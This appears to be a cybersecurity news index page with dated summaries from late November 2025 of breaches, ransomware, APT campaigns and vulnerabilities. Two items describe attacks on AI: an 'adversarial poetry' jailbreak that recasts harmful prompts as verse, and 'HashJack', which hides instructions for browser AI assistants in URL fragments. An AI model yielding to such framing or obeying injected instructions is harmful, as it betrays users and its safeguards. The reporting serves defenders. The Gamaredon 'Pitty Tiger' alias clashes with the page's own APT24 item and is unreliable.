A strategic intelligence report published by CYFIRMA on November 28, 2025, analyzes North Korea's increasing reliance on cybercrime as a core instrument of its statecraft. The report's release is timely, following Russia's 2024 veto that disbanded the UN Panel of Experts responsible for monitoring North Korean sanctions evasion. The analysis details how state-sponsored groups like the Lazarus Group conduct large-scale cyber operations, including cryptocurrency heists and ransomware attacks, to generate revenue that directly funds the nation's weapons programs and sustains the regime.

Nov 29, 20254 min read

Under Armour Investigates Ransomware Attack, Data Theft Claims

Athletic apparel giant Under Armour is investigating a ransomware attack that has impacted its internal corporate systems. According to a report from November 28, 2025, an unidentified ransomware group has claimed responsibility and alleges it has exfiltrated a large volume of data, including personal records for "millions of individuals." Under Armour has acknowledged the unauthorized access and launched a forensic investigation to determine the scope of the breach and verify the attackers' claims. The incident has caused internal disruptions and poses a significant data privacy risk.

Nov 29, 20255 min read

DoorDash Discloses Another Breach via Third-Party Vendor

Food delivery service DoorDash disclosed another data breach on November 27, 2025, resulting from a compromise at an unnamed third-party service provider. The incident, reported on November 28, exposed information belonging to both customers and delivery drivers. This breach marks the latest in a series of security incidents for DoorDash involving its supply chain, highlighting persistent vulnerabilities in its network of external vendors and raising concerns about the security of its platform.

Nov 29, 20255 min read

Oracle Cloud Misconfiguration Exposes Customer Data

Oracle has reported a data breach stemming from misconfigured resources within its own Oracle Cloud Infrastructure (OCI). The incident, first noted on November 13 and analyzed in a report on November 28, 2025, allowed external, unauthorized access to a portion of its cloud environment where customer data was stored. While the full scope and specific customers affected have not been detailed, the breach highlights the significant security challenges of managing large-scale cloud environments, demonstrating that even major cloud providers are susceptible to internal configuration errors.

Nov 29, 20254 min read

MaaS Provider TAG-150 Distributes Modular Loader and RAT

A Malware-as-a-Service (MaaS) provider, tracked as TAG-150, has been identified operating a campaign active since at least March 2025. According to a threat intelligence report from November 29, 2025, the group is distributing a modular loader that delivers a Remote Access Trojan (RAT). The operation is focused on information theft and leverages user interaction and living-off-the-land techniques to compromise systems. The campaign highlights the ongoing threat from the MaaS ecosystem, which provides cybercriminals with ready-made tools to conduct attacks.

Nov 29, 20254 min read

French Football Federation Data Breach Exposes Player Info Via Single Compromised Account

The French Football Federation (FFF) announced a significant data breach on November 28, 2025, after an attacker gained access to a centralized administrative software platform using a single compromised user account. The breach exposed the personally identifiable information (PII) of a large number of its 2.3 million members, including names, contact details, and birth dates. The attackers did not exploit a software vulnerability but rather leveraged stolen credentials to gain administrative control. In response, the FFF disabled the account, forced a password reset for all users, and notified both the French data protection authority (CNIL) and the national cybersecurity agency (ANSSI). This incident highlights the critical risk posed by credential compromise and the trend of cyberattacks targeting sports organizations.

Nov 28, 20256 min read

IT Professional Jailed for 7 Years in Australia for 'Evil Twin' Wi-Fi Attacks on Flights

An Australian IT professional, Michael Clapsis, has been sentenced to seven years and four months in prison for conducting sophisticated 'evil twin' Wi-Fi attacks. Using a Wi-Fi Pineapple device, he created rogue Wi-Fi hotspots at airports and on flights to trick travelers into entering their credentials into a phishing portal. Clapsis then used this access to infiltrate the online accounts of multiple women, stealing thousands of private images and videos. The Australian Federal Police (AFP) investigation began after airline staff reported a suspicious network. Clapsis also attempted to obstruct the investigation by deleting evidence and abusing his IT privileges at work to spy on meetings between his employer and the AFP.

Nov 28, 20255 min read

Massive Scan of Public GitLab Repositories Uncovers Over 17,000 Live Secrets

A security engineer, Luke Marshall, conducted a large-scale scan of all 5.6 million public repositories on GitLab Cloud, uncovering 17,430 verified, live secrets. The exposed credentials include thousands of API keys and access tokens for over 2,800 unique domains, with Google Cloud Platform (GCP) keys being the most common. The scan, performed using the open-source tool TruffleHog, highlights the pervasive issue of developers hardcoding secrets in public code. Alarmingly, 406 valid GitLab access tokens were found within GitLab's own repositories. The research also uncovered 'zombie secrets' that have remained valid for over a decade, posing a long-term risk. Marshall's responsible disclosure efforts led to multiple bug bounty payouts.

Nov 28, 20256 min read

Legacy Python Scripts Create Dormant Supply Chain Risk via Abandoned Domain

Security researchers at ReversingLabs have identified a long-dormant supply chain vulnerability within the Python ecosystem affecting packages that use the legacy 'zc.buildout' tool. Outdated bootstrap scripts (`bootstrap.py`) found in several PyPI packages contain hardcoded references to an abandoned domain, `python-distribute.org`. This domain, once used for a fork of the Setuptools project, is now for sale. An attacker could purchase the domain, host malicious code, and automatically compromise any developer or build system that runs one of these legacy scripts. This creates a direct vector for malware injection, exposing an unknown number of projects to a decade-old risk.

Nov 28, 20256 min read

'Adversarial Poetry' Emerges as Universal Jailbreak for Major LLMs

A new research paper has unveiled a simple yet powerful technique, dubbed 'adversarial poetry,' that can consistently bypass the safety guardrails of major Large Language Models (LLMs). By reformulating harmful prompts into verse, researchers were able to achieve jailbreak success rates up to 18 times higher than with plain text. The technique proved effective as a 'universal single-turn jailbreak' across 25 different AI models, including both proprietary and open-source ones. It successfully generated content related to dangerous topics like CBRN threats and cyber-offenses, revealing a fundamental weakness in current AI alignment strategies that appear overly sensitive to a prompt's style rather than its semantic content.

Nov 28, 20256 min read

Bloody Wolf APT Shifts Tactics, Using Legitimate RATs to Target Central Asian Governments

The cyber-espionage group 'Bloody Wolf' has expanded its campaign, now targeting government entities in Kyrgyzstan and Uzbekistan. According to research from Group-IB, the APT group has evolved its tactics, moving away from custom malware to a more streamlined, Java-based delivery method. The new attack chain tricks victims into installing the legitimate NetSupport Manager remote administration tool (RAT). By using a widely recognized commercial tool, Bloody Wolf aims to evade detection by blending its malicious activities with normal administrative network traffic, sustaining its long-term espionage and data exfiltration goals.

Nov 28, 20256 min read

CISA Adds Actively Exploited OpenPLC XSS Flaw to KEV Catalog After Hacktivist Attacks

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added a cross-site scripting (XSS) vulnerability in OpenPLC ScadaBR, CVE-2021-26829, to its Known Exploited Vulnerabilities (KEV) catalog. The action, taken on November 28, 2025, follows confirmed reports of active exploitation by the pro-Russian hacktivist group TwoNet. The group was observed using the flaw to deface the HMI of an industrial control system honeypot. The medium-severity vulnerability allows an attacker with access to the system to inject malicious scripts. Federal agencies are now required to patch the flaw by December 19, 2025, to protect against this confirmed threat to ICS/OT environments.

Nov 28, 20257 min read

Tomiris APT Refines Toolkit, Using Discord and Telegram for C2 in Diplomatic Attacks

The cyber-espionage group 'Tomiris' has upgraded its tactical arsenal in a new wave of attacks targeting diplomatic and government organizations in Russia and Commonwealth of Independent States (CIS) countries. According to a new report from Kaspersky, the APT group is now using public services like Discord and Telegram for command-and-control (C2) communications to better evade detection. The group uses tailored spear-phishing emails to deliver a variety of payloads, including reverse shells and custom backdoors, and deploys specialized 'FileGrabber' malware to steal documents, demonstrating a focus on long-term intelligence gathering.

Nov 28, 20256 min read

Major Cyberattack Hits Three London Councils, Crippling Public Services

A major cyber incident was declared on November 26, 2025, after a coordinated attack struck the shared IT infrastructure of three London councils: the Royal Borough of Kensington and Chelsea (RBKC), Westminster City Council (WCC), and the London Borough of Hammersmith and Fulham (LBHF). The attack disrupted essential services, including phone lines, for over half a million residents. The councils, which operate under a joint IT arrangement, were forced to activate emergency protocols to maintain critical functions. The UK's National Cyber Security Centre (NCSC) is assisting with the investigation. While the nature of the attack is unconfirmed, experts suspect it is a ransomware incident, potentially targeting a shared managed service provider (MSP), raising fears of a significant data breach involving sensitive citizen information.

Nov 27, 20256 min read

New 'HashJack' Attack Injects Malicious Prompts into AI Browsers

On November 26, 2025, researchers disclosed a novel indirect prompt injection attack called 'HashJack' that targets AI-enabled web browsers. The technique works by embedding malicious instructions in the fragment portion of a URL (the text following a '#' symbol). Because URL fragments are processed client-side and are not sent to the server, they are invisible to most network security tools like firewalls and web gateways. However, AI assistants integrated into browsers often parse the full URL, including the fragment, to gain context. This allows an attacker to craft a seemingly benign link that, when visited, secretly instructs the user's AI assistant to perform malicious actions, creating a significant new attack surface.

Nov 27, 20256 min read

Mitsubishi ICS Software Flaw Exposes Credentials in Plaintext

On November 27, 2025, Mitsubishi Electric issued a security advisory for CVE-2025-3784, an information disclosure vulnerability in its GX Works2 industrial control system (ICS) software. The flaw, which affects all versions of the software, involves the storage of credential information in plaintext within project files. An attacker with local access to a computer running the software could extract these credentials and use them to bypass authentication on project files, allowing them to view or modify critical industrial process information. The vulnerability has a CVSS score of 5.5. Mitsubishi is developing a patch and has provided interim mitigation guidance.

Nov 27, 20256 min read

Critical 10.0 CVSS Flaw in Azure Bastion Allows Full Cloud Takeover

Microsoft has patched a critical authentication bypass vulnerability, CVE-2025-49752, in its Azure Bastion service. The flaw, which scores a perfect 10.0 on the CVSS scale, could allow a remote, unauthenticated attacker to gain administrative control over all virtual machines connected via a vulnerable Bastion host. The vulnerability is a capture-replay flaw, where an attacker can intercept and reuse authentication tokens. All Azure Bastion deployments created before the patch on November 20, 2025, are considered vulnerable, and customers are urged to ensure their instances are updated.

Nov 27, 20255 min read

Asahi Breweries Crippled by Ransomware Attack, Shipments Plummet to 10% Ahead of Peak Holiday Season

Japan's largest brewer, Asahi Group Holdings Ltd., is facing severe operational paralysis more than a month after a devastating ransomware attack. The attack disabled the company's core order and shipment management system, forcing a regression to manual processes like phone calls and faxes. As a result, shipments are at only 10% of normal levels, a critical blow as the company enters its busiest sales month. The incident, which has also forced Asahi to postpone its Q3 earnings report, highlights the extreme vulnerability of complex supply chains and legacy IT systems to modern cyber threats.

Nov 26, 20255 min read

CodeRED Emergency Alert System Crippled by 'Inc Ransom' Attack, Disrupting US Public Safety

The OnSolve CodeRED emergency alert system, a critical communication tool for hundreds of U.S. municipalities, has been taken offline following a ransomware attack claimed by the 'Inc Ransom' group. The attack, which began on November 1, 2025, resulted in the encryption of systems and the exfiltration of user data, including names, addresses, and contact information. After failed ransom negotiations, the vendor was forced to decommission the legacy platform, causing significant service disruptions for local governments in numerous states and leaving them unable to issue vital public safety notifications.

Nov 26, 20256 min read

Geopolitical Shift: Russian and North Korean State Hackers Found Sharing Attack Infrastructure

In a rare and alarming discovery, security researchers have found evidence of operational collaboration between two of the world's most prolific state-sponsored hacking groups: Russia's Gamaredon (Pitty Tiger) and North Korea's Lazarus. The evidence centers on a shared command-and-control (C2) server IP address that was used by both groups within days of each other to deliver their respective malware payloads. This convergence of TTPs and infrastructure signals a potential new phase of cyber operations where geopolitical alliances between Moscow and Pyongyang are extending into direct, cooperative attacks, potentially amplifying the threat level for defenders globally.

Nov 26, 20256 min read

Water Gamayun APT Exploits Novel 'MSC EvilTwin' Windows Flaw in Stealthy Attacks

The Russia-aligned APT group Water Gamayun is actively exploiting a novel vulnerability in the Windows Microsoft Management Console (MMC), tracked as CVE-2025-26633. The attack, analyzed by Zscaler and dubbed 'MSC EvilTwin,' uses a malicious .msc file to proxy code execution through the trusted mmc.exe binary, making it difficult to detect. The multi-stage campaign begins with a malicious download and uses embedded commands to execute hidden PowerShell payloads. This technique allows the attackers to install backdoors and information stealers while evading traditional security measures, showcasing the group's continued sophistication in developing stealthy intrusion methods.

Nov 26, 20256 min read

CISA Warns of Critical Flaws in Industrial Control Systems, Including CVSS 10.0 Bug

On November 25, 2025, CISA issued seven new advisories for vulnerabilities in Industrial Control Systems (ICS) from multiple vendors, including Rockwell Automation, Opto 22, and Zenitel. The flaws affect equipment used globally in critical manufacturing and communications sectors. The most severe vulnerability, CVE-2025-64130, is a critical OS command injection flaw in Zenitel communications equipment with a CVSS score of 10.0, which could allow for remote code execution. Other advisories cover flaws leading to denial-of-service and information exposure, prompting CISA to urge immediate review and mitigation by asset owners.

Nov 26, 20256 min read

NVIDIA AI Toolkit and WordPress Plugins Hit with High-Severity Flaws

On November 25, 2025, several new software vulnerabilities were disclosed, including a high-severity Server-Side Request Forgery (SSRF) flaw in NVIDIA's NeMo Agent Toolkit (CVE-2025-33203) used for AI development. This flaw could lead to information disclosure and denial of service. Concurrently, vulnerabilities were found in popular WordPress plugins. The 'Just Highlight' plugin is affected by a stored Cross-Site Scripting (XSS) bug (CVE-2025-13311), while the 'Locker Content' plugin has a sensitive information exposure flaw (CVE-2025-12525) that could allow unauthenticated attackers to bypass content restrictions.

Nov 26, 20256 min read

Homeland Security Warns Gov't Shutdown and Lapsed Law Cripple U.S. Cyber Defenses

The U.S. House Committee on Homeland Security has issued a stark warning in its latest 'Cyber Threat Snapshot,' stating that the nation's ability to defend against cyber threats is being severely hampered. The report cites a dual crisis: a federal government shutdown that furloughs key cybersecurity personnel, and the lapse of the Cybersecurity Information Sharing Act of 2015. This creates 'dangerous blind spots' at a time of heightened threat activity from nation-state actors like China and Iran, and a surge in attacks against U.S. critical infrastructure.

Nov 25, 20254 min read

Akira Ransomware Targets M&A Blind Spots, Breaching Firms via Inherited SonicWall Devices

The Akira ransomware group is exploiting security blind spots created during corporate mergers and acquisitions (M&A). According to research by ReliaQuest, Akira affiliates are gaining initial access to acquiring companies by compromising vulnerable SonicWall SSL VPN appliances inherited from smaller, acquired firms. Attackers leverage the fact that the acquiring organizations are often unaware of these unpatched, legacy devices on their new network. Once inside, they use zombie credentials and move laterally, with the time from lateral movement to ransomware deployment averaging less than one hour, highlighting a rapid and effective attack chain.

Nov 25, 20255 min read

URGENT: CISA Orders 7-Day Patch for Actively Exploited FortiWeb Zero-Day

Fortinet has disclosed a critical OS command injection zero-day vulnerability, CVE-2025-58034, in its FortiWeb Web Application Firewall (WAF) that is being actively exploited in the wild. The flaw allows an authenticated attacker to execute arbitrary commands on the underlying system. In response to observed attacks, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added the vulnerability to its Known Exploited Vulnerabilities (KEV) catalog and issued an emergency directive mandating federal agencies apply patches within an accelerated seven-day window, by November 25, 2025. Researchers have detected approximately 2,000 attacks leveraging the flaw and warn it could potentially be chained with a recently disclosed authentication bypass vulnerability (CVE-2025-64446) to achieve unauthenticated remote code execution.

Nov 24, 20255 min read

Massive NPM Supply Chain Attack Spreads Self-Replicating "Shai-Hulud" Worm

A significant, ongoing supply chain attack is targeting the NPM JavaScript ecosystem, where a self-replicating worm dubbed "Shai-Hulud" has infected over 400 software packages. The attack has a substantial impact on the cryptocurrency sector, compromising at least 10 widely used libraries crucial for the Ethereum Name Service (ENS), including 'content-hash' and 'address-encoder'. The malware functions as a general-purpose credential stealer, exfiltrating secrets like wallet keys from infected developer environments. The scale is vast, with researchers at Wiz observing over 25,000 affected repositories, highlighting a critical threat to developer infrastructure worldwide.

Nov 24, 20255 min read

FCC Rolls Back ISP Cybersecurity Rules Despite China-Linked Hacking Threats

In a controversial decision, the U.S. Federal Communications Commission (FCC) has rescinded cybersecurity regulations for internet service providers (ISPs). These rules were implemented by the Biden Administration following the discovery that the Chinese state-sponsored hacking group Salt Typhoon had breached major U.S. carriers. The revoked rules mandated minimum security standards and compliance certifications. The FCC claimed the original ruling was based on a "flawed legal analysis," but the move has drawn sharp criticism, with Commissioner Anna M. Gomez stating it leaves the country "less secure" against increasing nation-state threats.

Nov 24, 20254 min read

Akira Ransomware Gang Hits LG Energy Solution, Claims 1.7TB Data Theft

South Korean battery manufacturing giant LG Energy Solution has confirmed it was the victim of a ransomware attack at one of its overseas facilities. The notorious Akira ransomware gang has claimed responsibility for the breach, alleging on its dark web leak site that it stole 1.7 terabytes of data from the company's network. While LG Energy Solution reports that the affected systems have been restored and its headquarters was not impacted, the incident highlights the continued threat of double-extortion ransomware attacks against the manufacturing sector. The Akira gang has been highly active, often gaining initial access via compromised VPN credentials.

Nov 24, 20255 min read

New "Autumn Dragon" Espionage Campaign Targets Southeast Asia

A newly identified cyber-espionage campaign named "Autumn Dragon" has been targeting government and media organizations across Southeast Asia since early 2025. The operation, attributed with medium confidence to a China-nexus Advanced Persistent Threat (APT) group, aims to gather intelligence related to the South China Sea. The attackers use spearphishing emails with malicious WinRAR archives that exploit the vulnerability CVE-2025-8088. Upon execution, a dropper script masquerading as a Windows Defender update retrieves and runs additional payloads to establish a foothold for intelligence gathering.

Nov 24, 20255 min read

ShadowPad Backdoor Deployed via Critical WSUS Server Vulnerability

An active intrusion campaign is exploiting a critical remote code execution (RCE) vulnerability, CVE-2025-59287, in Microsoft's Windows Server Update Services (WSUS). Attackers, believed to be Chinese state-sponsored APTs, are leveraging the flaw to gain system-level access and deploy the sophisticated ShadowPad backdoor. The attack chain involves using PowerShell and legitimate system utilities like 'certutil' and 'curl' to download the malware, which is then executed using a DLL sideloading technique for stealth and persistence. The campaign highlights the rapid weaponization of newly disclosed vulnerabilities for espionage purposes.

Nov 24, 20255 min read

Supply Chain Breaches Escalate Despite Maturing Defenses, Report Finds

A new 2025 report from cybersecurity firm BlueVoyant reveals a troubling trend: despite most organizations maturing their third-party risk management (TPRM) programs, the number of supply chain breaches is escalating. The study found that 97% of surveyed organizations experienced a supplier-related security incident in the past year, a significant jump from 81% in 2024. The report identifies ineffective tool integration and internal organizational silos as key barriers, with the manufacturing sector being particularly hard-hit, averaging 3.8 breaches per organization.

Nov 24, 20254 min read

Ransomware Attacks Peak on Holidays and Weekends, Exploiting Low Staffing

A new global study by Semperis, the "2025 Holiday Ransomware Risk Report," confirms that threat actors strategically launch attacks during holidays and weekends to exploit reduced security staffing. The report found that 52% of organizations were targeted during these off-hour periods. Alarmingly, 78% of companies cut their Security Operation Center (SOC) staffing by 50% or more during these times. The study also revealed that 60% of attacks follow major corporate events like mergers or layoffs, when organizations are most distracted.

Nov 24, 20253 min read

Italian IT Firm Almaviva Hit by Cyberattack, 2.3TB of Data Leaked

The prominent Italian IT services provider Almaviva has confirmed it was hit by a major cyberattack, resulting in the theft and leaking of nearly 2.3 terabytes of sensitive data. The breach has exposed information from several of Almaviva's clients, most notably Italy's national railway operator, Ferrovie dello Stato Italiane. The leaked files reportedly include highly sensitive data such as passenger passport details, employee records, financial documents, and defense-related contracts. The identity of the attackers has not yet been disclosed.

Nov 24, 20255 min read

Harvard University Data Breach Exposes Donor Information After Phone Phishing Attack

Harvard University has disclosed a data breach affecting its Alumni Affairs and Development Office, discovered on November 18, 2025. The incident originated from a phone-based phishing (vishing) attack that gave an unauthorized party access to systems containing personal information and donation records of university affiliates and donors. While highly sensitive data like Social Security numbers were reportedly not compromised, the breach exposed names, contact details, and donation histories. This attack follows a similar pattern seen in recent incidents at Princeton University and the University of Pennsylvania, indicating a targeted campaign against the development departments of major educational institutions.

Nov 23, 20255 min read

Logitech Confirms Breach: Clop Ransomware Exploits Oracle Zero-Day

Logitech has confirmed it suffered a data breach after the Clop ransomware gang exploited a zero-day vulnerability in Oracle's E-Business Suite (CVE-2025-61882). The consumer electronics giant stated that an unauthorized third party accessed and copied data related to employees, consumers, and suppliers. The incident is part of a wider campaign by Clop that has impacted numerous major organizations. Logitech asserts that sensitive personal data like credit card numbers was not exposed and business operations remain unaffected.

Nov 23, 20255 min read

CISA KEV Alert: Actively Exploited Oracle RCE Flaw Allows Full System Takeover

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added a critical remote code execution (RCE) vulnerability in Oracle Identity Manager, CVE-2025-61757, to its Known Exploited Vulnerabilities (KEV) catalog. The flaw, with a CVSS score of 9.8, allows an unauthenticated attacker to achieve RCE by chaining an authentication bypass with a code injection flaw in a Groovy script endpoint. Evidence of in-the-wild exploitation, including scans detected weeks before a patch was available, has prompted CISA to issue a patching deadline of December 12, 2025, for federal agencies.

Nov 22, 20255 min read

Chinese APT24 Group Uses 'BadAudio' Malware in Years-Long Espionage Campaign Targeting Taiwan

The Chinese-nexus threat group APT24, also known as Pitty Tiger, is behind a nearly three-year cyberespionage campaign utilizing a new custom malware called 'BadAudio'. According to Google's Threat Intelligence Group, the campaign, active since November 2022, has targeted organizations primarily in Taiwan. The group has evolved its tactics from broad web compromises to sophisticated supply chain attacks and spear-phishing. BadAudio is a C++ downloader that uses DLL search-order hijacking and control flow flattening to evade detection before deploying second-stage payloads like Cobalt Strike.

Nov 22, 20256 min read

Major Wall Street Banks Exposed After Breach at Mortgage Vendor SitusAMC

SitusAMC, a critical technology and services provider for the real estate finance industry, has disclosed a significant data breach discovered on November 12, 2025. The cyberattack compromised corporate information and, more critically, data belonging to its clients' customers, which could include sensitive personal information from mortgage applications. Major financial institutions, including JPMorgan Chase, Citigroup, and Morgan Stanley, have reportedly been notified of their potential exposure. The FBI is investigating the incident, which highlights the systemic risk posed by third-party vendors in the financial sector.

Nov 22, 20255 min read

Grafana Enterprise Hit by Critical 10.0 CVSS Flaw Allowing Admin Impersonation

Grafana Labs has patched a critical vulnerability, CVE-2025-41115, in Grafana Enterprise that carries the maximum CVSS score of 10.0. The flaw resides in the SCIM provisioning feature and allows a malicious SCIM client to escalate privileges and impersonate any user, including the default administrator, by manipulating the 'externalId' attribute. The vulnerability affects Grafana Enterprise versions 12.0.0 through 12.2.1 and requires specific feature flags to be enabled. Grafana has released patches and confirmed its own cloud instances were not exploited.

Nov 22, 20255 min read

CrowdStrike Fires Insider for Leaking Screenshots to 'Scattered Lapsus$ Hunters' Hacking Group

Cybersecurity giant CrowdStrike has confirmed it fired an employee last month for acting as a malicious insider. The employee leaked screenshots of internal systems, including an Okta dashboard, to the 'Scattered Lapsus$ Hunters' hacking group, who then posted them on Telegram. CrowdStrike stated that it detected and terminated the insider, that its corporate systems were not breached, and that no customer data was compromised. The hackers claimed to have offered the employee $25,000 for access, highlighting the persistent threat of malicious insiders even at top security firms.

Nov 22, 20255 min read

ShinyHunters Hits Salesforce Again, Breaching Customers via Gainsight App

Salesforce has disclosed a significant data breach affecting its customers, stemming from a compromised connection with the Gainsight customer success application. The notorious cybercrime group ShinyHunters, also tracked as UNC6240, has claimed responsibility for the attack, stating they exploited OAuth tokens to gain unauthorized access to approximately 285 additional Salesforce instances. In response, Salesforce has revoked credentials and removed the Gainsight apps from its AppExchange. The incident highlights the growing risk of supply chain attacks targeting trusted third-party SaaS integrations to pivot into major enterprise environments.

Nov 21, 20256 min read

SEC Abandons Landmark Lawsuit Against SolarWinds and its CISO

In a surprising move, the U.S. Securities and Exchange Commission (SEC) has voluntarily dismissed its civil enforcement action against SolarWinds and its CISO, Timothy G. Brown. The lawsuit, filed in October 2023, had accused the company and Brown of misleading investors about their cybersecurity posture before the 2020 SUNBURST supply chain attack. The dismissal is seen as a major victory for the cybersecurity community, which had feared the case would set a dangerous precedent for holding security executives personally liable for breaches and create a chilling effect on transparency.

Nov 21, 20255 min read

SANS Report: OT/ICS Cyber Incidents Rising, 40% Cause Downtime

A new report from the SANS Institute highlights a dangerous trend in the security of Operational Technology (OT) and Industrial Control Systems (ICS). The '2025 State of ICS/OT Security Report' found that over 21% of organizations experienced a cyber incident in their OT environment in the past year. Of those, 40.3% suffered operational downtime. Ransomware was a primary cause, responsible for 37.9% of incidents, with unauthorized external connections being the top initial access vector. The report also points to a significant 'resilience gap,' with recovery times often exceeding one month.

Nov 21, 20255 min read

WEL Companies Investigated for Data Breach Affecting 122,960 People

The law firm Schubert Jonckheer & Kolbe LLP is investigating transportation and logistics firm WEL Companies, Inc., following a data breach that compromised the sensitive personal information of 122,960 people. The breach, which exposed names, Social Security numbers, and driver's license numbers, was first detected in January 2025. However, the company only began notifying victims in November 2025, a delay of nearly ten months that could lead to legal action for violating data breach notification laws.

Nov 21, 20254 min read

Patch Now: Microsoft Fixes Actively Exploited Windows Kernel Zero-Day

As part of its November 2025 Patch Tuesday release, Microsoft has addressed 63 security vulnerabilities, including a high-severity zero-day flaw in the Windows Kernel (CVE-2025-62215) that is confirmed to be under active exploitation. The vulnerability is a local privilege escalation (LPE) bug with a CVSS score of 7.0, allowing an attacker who has already gained initial access to a system to elevate their privileges to SYSTEM level. Such flaws are critical components in post-exploitation attack chains, enabling threat actors to take full control of a compromised machine. The update also fixes 16 remote code execution (RCE) vulnerabilities and numerous other flaws across the Microsoft product suite. Immediate patching is strongly recommended for all Windows users.

Nov 21, 20255 min read

Sinobi Ransomware Strikes US Manufacturer and Indian Tech Firm

The 'sinobi' ransomware group has claimed responsibility for two recent cyberattacks targeting organizations in the United States and India. The victims are Croft, a U.S.-based window and door manufacturer, and CHANGEPOND, an enterprise software company headquartered in Chennai, India. Both breaches were discovered on November 19, 2025, occurring within minutes of each other. These incidents underscore the global reach and indiscriminate targeting of ransomware operators, affecting diverse sectors including manufacturing and technology. The attacks highlight the persistent threat posed by ransomware and the importance of robust cybersecurity defenses.

Nov 20, 20254 min read

CISA and Partners Release Guide to Combat Bulletproof Hosting

The U.S. Cybersecurity and Infrastructure Security Agency (CISA), along with the FBI, NSA, and international partners, has published a comprehensive guide to help network defenders and Internet Service Providers (ISPs) combat the threat of bulletproof hosting (BPH) providers. These services knowingly lease infrastructure to cybercriminals for a wide range of malicious activities, including ransomware, phishing, and malware distribution. The guide, 'Bulletproof Defense,' provides actionable recommendations for filtering malicious traffic, enhancing network monitoring, and improving intelligence sharing to disrupt the criminal ecosystem that relies on BPH for anonymity and resilience.

Nov 20, 20254 min read

CISA Issues 6 New ICS Advisories for Schneider Electric, Shelly, METZ CONNECT

On November 19, 2025, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) released six new Industrial Control Systems (ICS) advisories, highlighting multiple vulnerabilities in products from Schneider Electric, Shelly, and METZ CONNECT. The alerts affect a range of operational technology (OT) products, including SCADA systems and power monitoring devices. Four of the advisories are for Schneider Electric products like EcoStruxure and PowerChute. CISA urges administrators in critical infrastructure and manufacturing sectors to review the advisories and apply the recommended mitigations to prevent potential exploitation.

Nov 20, 20254 min read

CISA Releases "Be Air Aware" Guides to Combat Drone Threats

As part of Critical Infrastructure Security and Resilience Month, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) has released three new guides under its "Be Air Aware™" campaign. These resources are designed to help critical infrastructure owners and operators understand, assess, and mitigate the growing security risks posed by Unmanned Aircraft Systems (UAS), or drones. The guides provide actionable information on detecting suspicious drone activity, implementing detection technologies, and safely handling downed aircraft, aiming to integrate aerial threat considerations into existing security plans.

Nov 20, 20254 min read

New 'Nova Stealer' Malware Targets macOS Crypto Wallets

A new information-stealing malware, dubbed 'Nova Stealer,' has been discovered actively targeting Apple macOS users. The malware's primary goal is the exfiltration of sensitive data, with a specific focus on cryptocurrency wallets. Nova Stealer operates as a trojan, infecting systems by replacing legitimate, installed applications with malicious versions. When a user launches the compromised application, the malware activates in the background to search for and steal wallet files and other valuable information. This discovery underscores the increasing trend of threat actors developing malware for the macOS platform, challenging the perception of it being inherently more secure than Windows.

Nov 20, 20254 min read

Inc Ransom Cripples PA Attorney General's Office, Exfiltrates 5.7 TB of Data

The Pennsylvania Office of the Attorney General (OAG) has confirmed it suffered a severe data breach orchestrated by the Inc Ransom ransomware group. The attackers exploited the 'CitrixBleed2' vulnerability (CVE-2025-5777) to gain initial access and subsequently exfiltrated 5.7 terabytes of highly sensitive data. The stolen information includes Social Security numbers, medical details, and confidential investigative files. The attack, which occurred in August 2025, caused a three-week operational disruption for the agency's 1,200 staff members. The OAG has refused to pay the ransom and is working with the FBI on the investigation.

Nov 19, 20257 min read

US, UK, and Australia Sanction Russian Bulletproof Hosting Network Aiding Ransomware

In a coordinated action, the United States, United Kingdom, and Australia have sanctioned Media Land, LLC, a Russian bulletproof hosting provider, along with its network of related entities and key individuals. This infrastructure is accused of providing essential services to a wide range of global cybercriminals, including malware distributors, phishing operators, and ransomware groups like the notorious LockBit gang. The sanctions aim to disrupt the foundational services that enable cybercrime by targeting the providers who knowingly support malicious operations. The action highlights a strategic international effort to dismantle the cybercrime economy.

Nov 19, 20256 min read

CISA Adds Actively Exploited Fortinet FortiWeb Flaw to KEV Catalog

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added a critical OS command injection vulnerability in Fortinet's FortiWeb products, CVE-2025-58034, to its Known Exploited Vulnerabilities (KEV) catalog. Citing evidence of active exploitation, CISA has mandated a one-week remediation deadline for Federal Civilian Executive Branch (FCEB) agencies under Binding Operational Directive (BOD) 22-01. The vulnerability allows attackers to execute arbitrary commands on affected devices. CISA strongly urges all organizations using FortiWeb to prioritize patching this flaw to mitigate the threat.

Nov 19, 20256 min read

Chicago's St. Anthony Hospital Discloses Data Breach Affecting Over 6,600

St. Anthony Hospital in Chicago has reported a data breach that may have exposed the personal and medical information of more than 6,600 patients and staff members. The incident, which was discovered in February 2025, occurred when an unauthorized party gained access to several employee email accounts. An investigation revealed that the compromised accounts contained sensitive data, including names, Social Security numbers, medical record numbers, and medical histories. The hospital states there is no evidence the data has been misused but is in the process of notifying all affected individuals.

Nov 19, 20256 min read

Supply Chain Attacks & AI-Powered Phishing Surge Across Asia-Pacific, Darktrace Warns

A new threat report from cybersecurity firm Darktrace highlights a dramatic increase in sophisticated cyber threats across the Asia-Pacific and Japan (APJ) region. The report, covering the 12 months to July 2025, details a surge in supply chain attacks, business email compromise, and cloud intrusions. State-sponsored groups from China (APT40, APT41) and North Korea (Lazarus/Bluenoroff) are reportedly leveraging generative AI to create more convincing phishing emails, particularly in non-English languages like Japanese. The report also notes the high cost of supply chain breaches and the use of advanced voice-phishing by groups like Scattered Spider.

Nov 19, 20257 min read

China-Aligned APT 'PlushDaemon' Wields 'EdgeStepper' Implant for Network Hijacking

Security researchers have uncovered a new, sophisticated network implant named 'EdgeStepper' used by the China-aligned APT group PlushDaemon. The implant provides the attackers with adversary-in-the-middle (AitM) capabilities, allowing them to intercept and hijack legitimate software updates within a compromised network. EdgeStepper is deployed as part of a larger toolset that includes 'LittleDaemon' and 'DaemonicLogistics' to deliver a Windows implant called 'SlowStepper'. This framework enables the APT group to conduct espionage and deploy additional malware by masquerading as legitimate update traffic.

Nov 19, 20257 min read

Togo and Mozambique Forge Cybersecurity Pact to Strengthen African Defenses

